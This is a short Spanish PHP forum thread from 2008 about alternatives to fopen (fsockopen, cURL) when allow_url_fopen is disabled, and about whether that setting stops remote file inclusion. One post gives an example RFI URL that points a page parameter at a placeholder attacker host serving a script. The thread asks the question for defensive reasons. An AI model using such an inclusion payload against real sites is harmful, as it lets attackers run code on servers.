Foros del Web » Programando para Internet » PHP »

alternativa a fopen, pues allow_url_fopen es off

Estas en el tema de alternativa a fopen, pues allow_url_fopen es off en el foro de PHP en Foros del Web. Hola foreros, recientemente he desabilitado la opción allow_url_fopen de mi php_ini, entonces he tenido q desabilitar también un archivo que tenía para verificar webs q ...
  #1 (permalink)  
Antiguo 02/11/2008, 17:33
Avatar de eulloa  
Fecha de Ingreso: octubre-2007
Ubicación: Donde caiga la noche, si mi hijo me deja
Mensajes: 691
Antigüedad: 16 años, 6 meses
Puntos: 5
alternativa a fopen, pues allow_url_fopen es off

Hola foreros, recientemente he desabilitado la opción allow_url_fopen de mi php_ini, entonces he tenido q desabilitar también un archivo que tenía para verificar webs q estaban encendidas o no, donde precisamente, usaba fopen para esto.
La cuestión es: Necesito una alternativa para hacer esto con allow_url_fopen a OFF, y otra pregunta
¿Hasta donde realmente me protege allow_url_fopen a OFF contra RFI u otros tipos de ataques?

salu2
  #2 (permalink)  
Antiguo 02/11/2008, 17:41
Avatar de GatorV
$this->role('moderador');
 
Fecha de Ingreso: mayo-2006
Ubicación: /home/ams/
Mensajes: 38.567
Antigüedad: 18 años
Puntos: 2135
Respuesta: alternativa a fopen, pues allow_url_fopen es off

Hola eulloa,

Lo mejor es usar fsockopen, o cURL, con estas puedes hacer una petición http para realizar lo que pides.

Respecto a lo que dices de los ataques, no te ayudan en nada, ya que todo depende de como tengas implementado tu código, más que la directiva es tu código el que puede ser o no vulnerable.

Saludos.
  #3 (permalink)  
Antiguo 02/11/2008, 19:44
Avatar de eulloa  
Fecha de Ingreso: octubre-2007
Ubicación: Donde caiga la noche, si mi hijo me deja
Mensajes: 691
Antigüedad: 16 años, 6 meses
Puntos: 5
Respuesta: alternativa a fopen, pues allow_url_fopen es off

Gracias Gatorv
Bueno, pues la alternativa fsockopen me devuelve esto :
php_network_getaddresses: getaddrinfo failed: Name or service not known

Me parece q voy a optar por curl, pasaré a instalarlo y empezar a probar, he visto buena cantidad de biblio por donde guiarse, de todas formas si me queda algo, pues pregunto.
Lo de los ataques ¿al menos no me aseguro con esto que no puedan hacer algo como http://host_victima?pag = http://host_atacante/ataque.txt?

salu2
  #4 (permalink)  
Antiguo 02/11/2008, 22:38
Avatar de GatorV
$this->role('moderador');
 
Fecha de Ingreso: mayo-2006
Ubicación: /home/ams/
Mensajes: 38.567
Antigüedad: 18 años
Puntos: 2135
Respuesta: alternativa a fopen, pues allow_url_fopen es off

Mmm si te sale ese error es porque el host que estas tratando de meter no existe o no se puede conectar verifica como estas abriendo la conexión al host.

Recuerda que usando fscokopen es muy diferente a usar fopen con allow_url_fopen normal, necesitas abrir la conexión al host y luego hacer la petición HTTP.

Saludos.
  #5 (permalink)  
Antiguo 03/11/2008, 07:18
Avatar de eulloa  
Fecha de Ingreso: octubre-2007
Ubicación: Donde caiga la noche, si mi hijo me deja
Mensajes: 691
Antigüedad: 16 años, 6 meses
Puntos: 5
Respuesta: alternativa a fopen, pues allow_url_fopen es off

jejejeeje, ahí precisamente es que me quedo atrás, el host si existe y está onnline.
De todas formas curl me parece mejor, la instalo y cuento
salu2
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 04:21.